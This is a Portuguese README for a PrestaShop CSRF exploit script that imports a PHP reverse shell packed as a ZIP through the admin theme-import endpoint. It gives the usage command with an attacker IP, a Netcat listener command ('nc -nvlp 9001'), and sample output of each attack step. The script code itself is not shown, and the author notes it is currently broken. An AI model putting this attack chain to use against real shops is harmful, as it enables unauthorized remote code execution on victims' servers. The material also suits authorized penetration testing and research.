
Script automatizado de exploração CSRF para PrestaShop que carrega e executa um reverse shell PHP por meio de um payload ZIP manipulado, exigindo um listener Netcat para captura de conexão.
Este script automatiza um exploit de CSRF (Cross-Site Request Forgery) para enviar um reverse shell PHP para o servidor web do alvo e executá-lo. O reverse shell é entregue como um arquivo ZIP através de um payload CSRF elaborado, que é acionado quando um usuário privilegiado interage com um endpoint específico. O script requer uma instância do Netcat em modo de escuta para capturar a conexão do reverse shell.
Parece estar quebrado por enquanto, atualizarei depois
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: URL base do alvo (ex.: https://example.com).admin_endpoint: Caminho para o endpoint de importação de temas do admin.admin_email: Endereço de e-mail de um administrador (para falsificar no payload).attacker_ip: Endereço IP onde o listener do reverse shell receberá a conexão../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip e porta 9001 fornecidos.love.php) é comprimido em Love-exploit.zip.csrf_payload.html) contendo um script JavaScript para enviar automaticamente uma requisição maliciosa ao painel admin do alvo, importando o reverse shell.8000 serve o Love-exploit.zip para o alvo importar.Inicie um listener Netcat na sua máquina:
nc -nvlp 9001
Execute o script:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Aguarde o alvo executar o payload CSRF e receba a conexão do reverse shell.
O script exibe as seguintes informações durante a execução:
8000 (servidor HTTP) e 9001 (listener Netcat) estão livres antes de executar o script.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
Este documento é destinado ao uso por testadores de penetração e pesquisadores de cibersegurança em ambientes controlados. O uso indevido desta ferramenta para fins não autorizados é estritamente proibido.
Este script é apenas para fins educacionais e avaliações legais de cibersegurança. O uso não autorizado contra um sistema sem permissão é ilegal e contrário às diretrizes éticas.